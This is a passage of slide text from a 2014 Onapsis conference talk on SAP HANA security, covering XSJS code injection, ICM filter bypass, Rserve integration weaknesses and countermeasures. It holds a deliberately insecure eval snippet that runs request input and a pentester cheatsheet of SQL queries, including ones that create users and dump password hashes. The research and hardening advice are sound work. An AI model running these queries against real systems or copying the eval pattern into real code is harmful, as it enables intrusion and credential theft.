– © 2014 Onapsis , Inc. – All rights reserved 32NoSuchCon #2 www.onapsis.com – © 2014 Onapsis , Inc. – All rights reserved 32 • Through different vulnerabilities, an attacker could be able to modify/execute XSJS code • If DB queries can be executed, the JS code itself can be modified: • Insecure ‘eval’ assignment: $.response.contentType = "text/html"; var remotefn = eval($.request.parameters.get("eval")); var eval_a = eval(remotefn); $.response.setBody("RESULT:<p>"+eval_a); XSJS Code Impossible? See https://service.sap.com/sap/support/notes/2015446 from June 2014!
32.
33In-Memory platforms www.onapsis.com
– © 2014 Onapsis , Inc. – All rights reserved 33NoSuchCon #2 www.onapsis.com – © 2014 Onapsis , Inc. – All rights reserved 33 A note on the ICM HANA “inherited” the ICM web server From the documentation(*): “For the ICM or a Web Dispatcher with a release status of SAP NetWeaver 7.0 or below, the pattern used by the ICM filter is, by default, a blacklist with the following structure: <s*script[^>]*>(.*)<s*/scripts*>” (*) http://help.sap.com/saphelp_nw73/helpdata/en/4e/2606c0c61920cee10000000a42189c/content.htm?current_toc=/en/ae/ad1640033ae569e10000000a155106/plain.htm
33.
34In-Memory platforms www.onapsis.com
– © 2014 Onapsis , Inc. – All rights reserved 34NoSuchCon #2 www.onapsis.com – © 2014 Onapsis , Inc. – All rights reserved 34 DEMO ICM (and HANA) Pattern filter bypass
34.
35In-Memory platforms www.onapsis.com
– © 2014 Onapsis , Inc. – All rights reserved 35NoSuchCon #2 www.onapsis.com – © 2014 Onapsis , Inc. – All rights reserved 35 • Restrict packages exposed via http • Secure authentication methods required for package access • Restrict Access privileges! – System, Application,Object,Analytic,Package,Users – Use restricted user types for HTTP apps. • Enable Cross-Site-Request Forgery (XSRF) Protection • Do not rely ONLY on Patterns or magic escapes –Validate all parameters! • Consider built-in helpers like HTML5 Sanitizer(*) Countermeasures (*) http://help.sap.com/saphelp_hanaplatform/helpdata/en/23/15f02c34a04ed9b7ff6e79db44c701/content.htm?frameset=/en/91/f0bd316f4d1014b6dd926db0e91070/frameset.htm¤t_toc=/en/d0/1cd0b7be7f441cb6 c56ad4577b428c/plain.htm&node_id=329
35.
36In-Memory platforms www.onapsis.com
– © 2014 Onapsis , Inc. – All rights reserved 36NoSuchCon #2 www.onapsis.com – © 2014 Onapsis , Inc. – All rights reserved 36 HANA/R Integration
36.
37In-Memory platforms www.onapsis.com
– © 2014 Onapsis , Inc. – All rights reserved 37NoSuchCon #2 www.onapsis.com – © 2014 Onapsis , Inc. – All rights reserved 37 SAP HANA can be integrated with R-server “R is an open source programming language and software environment for statistical computing and graphics… The R language is widely used for advanced data analysis.” CREATE PROCEDURE MY_Func(OUT result “SCHEMA".“TTYPE") LANGUAGE RLANG AS BEGIN ### RCODE HERE END; © 2014 SAP AG or an SAP affiliate company. All rights reserved. Integration with R-lang
37.
38In-Memory platforms www.onapsis.com
– © 2014 Onapsis , Inc. – All rights reserved 38NoSuchCon #2 www.onapsis.com – © 2014 Onapsis , Inc. – All rights reserved 38 • R-Serve must be installed on a separate host – Remote connections must be enabled • R-serve exposes high privileged functions – remote shutdown of the service – os command execution (with the privileges of the user running the server) Attacks to the R Integration
38.
39In-Memory platforms www.onapsis.com
– © 2014 Onapsis , Inc. – All rights reserved 39NoSuchCon #2 www.onapsis.com – © 2014 Onapsis , Inc. – All rights reserved 39 • R-Serve must be configured to authenticate the connections. – No authentication means unauthenticated remote compromise of the host. – No restrictions on password strength or against bruteforce • R-Serve must be configured with transport-layer crypto, however no documentation about its support for HANA – Authentication exchange? – Sensitive information? Attacks to the R Integration
39.
40In-Memory platforms www.onapsis.com
– © 2014 Onapsis , Inc. – All rights reserved 40NoSuchCon #2 www.onapsis.com – © 2014 Onapsis , Inc. – All rights reserved 40 DEMOS “R-integrations”
40.
41In-Memory platforms www.onapsis.com
– © 2014 Onapsis , Inc. – All rights reserved 41NoSuchCon #2 www.onapsis.com – © 2014 Onapsis , Inc. – All rights reserved 41 • Secure the R-integration using SSL • Configure authentication using strong credentials • Restrict access to Rserve using a local firewall • Use low-privileged accounts to run Rserve. • Restrict shutdown ( and system?) Countermeasures
41.
42In-Memory platforms www.onapsis.com
– © 2014 Onapsis , Inc. – All rights reserved 42NoSuchCon #2 www.onapsis.com – © 2014 Onapsis , Inc. – All rights reserved 42 HANA is coded in c/c++ and developers can interact with functions developed in these languages: • XSCFUNC: Interface to call c/c++ functions directly from the browser. It is used to authenticate users, among other things. • AFL (Application Function Library): • Predictive Analysis Library: Defines functions that can be called from within SQLScript procedures to perform analytic algorithms • Business Function Library: Extends the computation ability of SAP HANA with complex and performance-critical algorithms sap/hana/xs/admin/config/config.xscfunc { "library": "libxsbase", "factory": "createRuntimeConfigApp", "method": "config" } Calling C/C++ functions
42.
43In-Memory platforms www.onapsis.com
– © 2014 Onapsis , Inc. – All rights reserved 43NoSuchCon #2 www.onapsis.com – © 2014 Onapsis , Inc. – All rights reserved 43 Demos Post-exploitation cmd execution
43.
44In-Memory platforms www.onapsis.com
– © 2014 Onapsis , Inc. – All rights reserved 44NoSuchCon #2 www.onapsis.com – © 2014 Onapsis , Inc. – All rights reserved 44 Pentester Cheatsheet!
44.
45In-Memory platforms www.onapsis.com
– © 2014 Onapsis , Inc. – All rights reserved 45NoSuchCon #2 www.onapsis.com – © 2014 Onapsis , Inc. – All rights reserved 45 Get Version select version from M_DATABASE List Code of XSJS WebApps select CDATA from _SYS_REPO.ACTIVE_OBJECT where OBJECT_SUFFIX='xsjs' List Privileges select * from EFFECTIVE_PRIVILEGES where USER_NAME=‘USER' select * from EFFECTIVE_ROLES WHERE USER_NAME =‘USER' List Databases select DATABASE_NAME from M_DATABASE List Tables select TABLE_NAME from M_TABLES select TABLE_NAME from TABLE_COLUMNS where COLUMN_NAME LIKE '%[Q]%’ Pentester cheatsheet
45.
46In-Memory platforms www.onapsis.com
– © 2014 Onapsis , Inc. – All rights reserved 46NoSuchCon #2 www.onapsis.com – © 2014 Onapsis , Inc. – All rights reserved 46 List Columns select COLUMN_NAME from TABLE_COLUMNS where TABLE_NAME=[TABLE_NAME] Create User CREATE USER my_user PASSWORD [PASSWORD]; List Password Hashes select PASSWORD from SYS.P_USER_PASSWORD_ where OID=(select OID from SYS.P_USERS_ where NAME='[USERNAME]') Get Comments /*COMMENT HERE*/ -- comment after dashes Pentester cheatsheet
46.
47In-Memory platforms www.onapsis.com
– © 2014 Onapsis , Inc. – All rights reserved 47NoSuchCon #2 www.onapsis.com – © 2014 Onapsis , Inc. – All rights reserved 47 Conclusions
47.
48In-Memory platforms www.onapsis.com
– © 2014 Onapsis , Inc. – All rights reserved 48NoSuchCon #2 www.onapsis.com – © 2014 Onapsis , Inc. – All rights reserved 48 • Business critical applications (the crown jewels) are supported by the latest technologies, therefore we must know how to secure them. • With this new paradigm, the impact of vulnerabilities will be different and will depend on several other factors. Old vulns could be critical. • SAP HANA was built with a security focus, however many responsibilities rely on the users (administrators, developers, end users…) • Keep up with SAP Documentation (Thanks to the SAP PSRT): – Read the SAP HANA Security Guide : http://help.sap.com/hana/SAP_HANA_Security_Guide_en.pdf – Follow SAP HANA Security Whitepaper which gives an overview of HANA Security as a good starting point: http://www.saphana.com/docs/DOC-3751 – SAP HANA Developer Guide which contains information on secure programming practices: http://help.sap.com/hana/SAP_HANA_Security_Guide_en.pdf – A good guide which gives information on how to build standard roles in HANA: https://scn.sap.com/docs/DOC-53974 Conclusions
48.
49NoSuchCon #2 www.onapsis.com
– © 2014 Onapsis , Inc. – All rights reserved 49 To the research team and specially to: • Abraham, Sergio • Perez-Etchegoyen, JP • Russ, Fernando • Sanchez, Nahuel • Vandevanter, Will Acknowledgements
49.
50NoSuchCon #2 www.onapsis.com
– © 2014 Onapsis , Inc. – All rights reserved 50 Questions? egutesman@onapsis.com @gutes Thanks
Download now